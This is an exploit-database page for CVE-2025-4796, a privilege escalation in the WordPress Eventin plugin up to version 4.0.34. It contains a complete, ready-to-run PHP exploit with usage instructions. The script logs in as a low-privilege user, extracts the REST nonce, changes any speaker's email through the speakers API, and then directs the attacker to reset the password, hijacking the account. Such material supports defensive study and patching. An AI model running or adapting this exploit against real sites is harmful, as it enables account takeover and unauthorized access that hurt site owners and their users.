Vulners
Lucene search
📄 WordPress Eventin 4.0.34 Account Takeover
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Exploit for Authorization Bypass Through User-Controlled Key in Themewinter Eventin | 25 Oct 202503:35 | – | githubexploit |
| Exploit for Authorization Bypass Through User-Controlled Key in Themewinter Eventin | 31 Oct 202510:39 | – | githubexploit |
 | CVE-2025-4796 | 10 Aug 202509:01 | – | circl |
 | WordPress plugin Eventin 安全漏洞 | 8 Aug 202500:00 | – | cnnvd |
 | WordPress Eventin plugin elevation of privilege vulnerability | 15 Aug 202500:00 | – | cnvd |
 | CVE-2025-4796 | 8 Aug 202518:26 | – | cve |
 | CVE-2025-4796 Eventin <= 4.0.34 - Authenticated (Contributor+) Privilege Escalation via User Email Change/Account Takeover | 8 Aug 202518:26 | – | cvelist |
 | EUVD-2025-24006 | 3 Oct 202520:07 | – | euvd |
 | CVE-2025-4796 | 8 Aug 202519:15 | – | nvd |
 | CVE-2025-4796 | 8 Aug 202519:15 | – | osv |
10
=============================================================================================================================================
| # Title : WordPress Eventin 4.0.34 Account Takeover Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/wp-event-solution/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/210929/ & CVE-2025-4796
[+] Summary :
A critical vulnerability exists in the Speaker Management component of the target
where an authenticated attacker can intercept the speaker update process and change any
speaker’s registered email address without proper authorization.
This flaw allows the attacker to hijack arbitrary accounts by modifying the email field
and subsequently triggering a password reset workflow.
The flaw is caused by insufficient authorization checks on the update_speaker endpoint
combined with predictable nonce retrieval.
[+] Affected Versions
----------------------------------------
All tested versions are confirmed vulnerable.
Vendor has not released a fix at the time of publishing.
[+] Vulnerability Details
----------------------------------------
The update_speaker.php endpoint accepts multiple fields including speaker_id and email
without verifying that the user performing the action is authorized to update the target
record.
Additionally, the anti-CSRF nonce can be extracted by any authenticated user, making
cross-user actions possible.
Impact:
- Account takeover
- Unauthorized email modification
- Privilege escalation
- Full speaker profile compromise
[+] Usage
----------
Save the file:
poc.php
Run:
php poc.php https://target-site.com [email protected] 12 admin 123456
[+] Poc
<?php
/*
* WordPress Eventin 4.0.34 Account Takeover
* By: Indoushka
*/
/* ---------------------------
SAFE PRINT
---------------------------- */
function Nxploited_safe_print($text) {
try {
echo $text . PHP_EOL;
} catch (Throwable $e) {
echo "[!] Print Error: " . $e->getMessage() . PHP_EOL;
}
}
/* ---------------------------
URL VALIDATION
---------------------------- */
function Nxploited_validate_url($url) {
if (!preg_match('/^https?:\/\//i', $url)) {
$url = "http://" . $url;
}
return rtrim($url, "/");
}
/* ---------------------------
EMAIL VALIDATION
---------------------------- */
function Nxploited_validate_email($email) {
return filter_var($email, FILTER_VALIDATE_EMAIL);
}
/* ---------------------------
DISABLE SSL WARNINGS
---------------------------- */
function Nxploited_disable_ssl(&$ch) {
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
}
/* ---------------------------
LOGIN FUNCTION
---------------------------- */
function Nxploited_login($url, $username, $password, $user_agent) {
Nxploited_safe_print("[*] إرسال طلب تسجيل الدخول ...");
usleep(500000); // 0.5 ثانية (بديل sleep الممنوع)
$login_url = $url . "/wp-login.php";
$data = http_build_query([
'log' => $username,
'pwd' => $password,
'rememberme' => 'forever',
'wp-submit' => 'Log In'
]);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
Nxploited_disable_ssl($ch);
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
$response = curl_exec($ch);
$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$headers = substr($response, 0, $header_size);
curl_close($ch);
preg_match_all('/Set-Cookie:\s*([^;]+);/i', $headers, $m);
$cookies = $m[1];
foreach ($cookies as $c) {
if (strpos($c, "wordpress_logged_in") !== false) {
Nxploited_safe_print("[+] تسجيل الدخول ناجح.");
return true;
}
}
Nxploited_safe_print("[-] فشل تسجيل الدخول.");
exit(1);
}
/* ---------------------------
NONCE EXTRACTION
---------------------------- */
function Nxploited_extract_nonce($url, $user_agent) {
Nxploited_safe_print("[*] استخراج Nonce ...");
usleep(600000);
$admin_url = $url . "/wp-admin/post-new.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
Nxploited_disable_ssl($ch);
$resp = curl_exec($ch);
curl_close($ch);
if (preg_match('/createNonceMiddleware\(\s*"([a-zA-Z0-9]+)"/', $resp, $m)) {
Nxploited_safe_print("[+] Nonce: " . $m[1]);
return $m[1];
}
Nxploited_safe_print("[-] فشل استخراج Nonce.");
exit(1);
}
/* ---------------------------
UPDATE SPEAKER
---------------------------- */
function Nxploited_update_speaker($url, $speaker_id, $email, $nonce, $user_agent) {
Nxploited_safe_print("[*] تحديث بيانات المتحدث ...");
usleep(600000);
$api_url = $url . "/wp-json/eventin/v2/speakers/" . $speaker_id;
$payload = json_encode(["email" => $email], JSON_UNESCAPED_UNICODE);
$headers = [
"Content-Type: application/json",
"X-WP-Nonce: $nonce",
"User-Agent: $user_agent",
"Cookie: " . trim(file_get_contents("cookies.txt"))
];
$ch = curl_init($api_url);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "PUT");
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
Nxploited_disable_ssl($ch);
$resp = curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
$json = json_decode($resp, true);
if ($code === 200 && isset($json["email"])) {
Nxploited_safe_print("[+] تم تحديث البريد إلى: $email");
return true;
}
Nxploited_safe_print("[-] فشل التحديث!");
print_r($json);
exit(1);
}
/* ---------------------------
SUCCESS BANNER
---------------------------- */
function Nxploited_custom_success($speaker_id, $email) {
Nxploited_safe_print("\n==============================");
Nxploited_safe_print(" Exploitation Completed");
Nxploited_safe_print("==============================");
Nxploited_safe_print("Speaker ID : $speaker_id");
Nxploited_safe_print("Email : $email");
Nxploited_safe_print("Please reset your password using the new email.\n");
}
/* ---------------------------
MAIN
---------------------------- */
$url = Nxploited_validate_url($argv[1]);
$email = $argv[2];
$speaker_id = $argv[3];
$username = $argv[4];
$password = $argv[5];
$user_agent = "Mozilla/5.0 (Indoushka PoC)";
if (!Nxploited_validate_email($email)) {
Nxploited_safe_print("[-] البريد غير صالح.");
exit(1);
}
Nxploited_login($url, $username, $password, $user_agent);
$nonce = Nxploited_extract_nonce($url, $user_agent);
Nxploited_update_speaker($url, $speaker_id, $email, $nonce, $user_agent);
Nxploited_custom_success($speaker_id, $email);
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Mar 2026 00:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.18.8
EPSS0.001
SSVC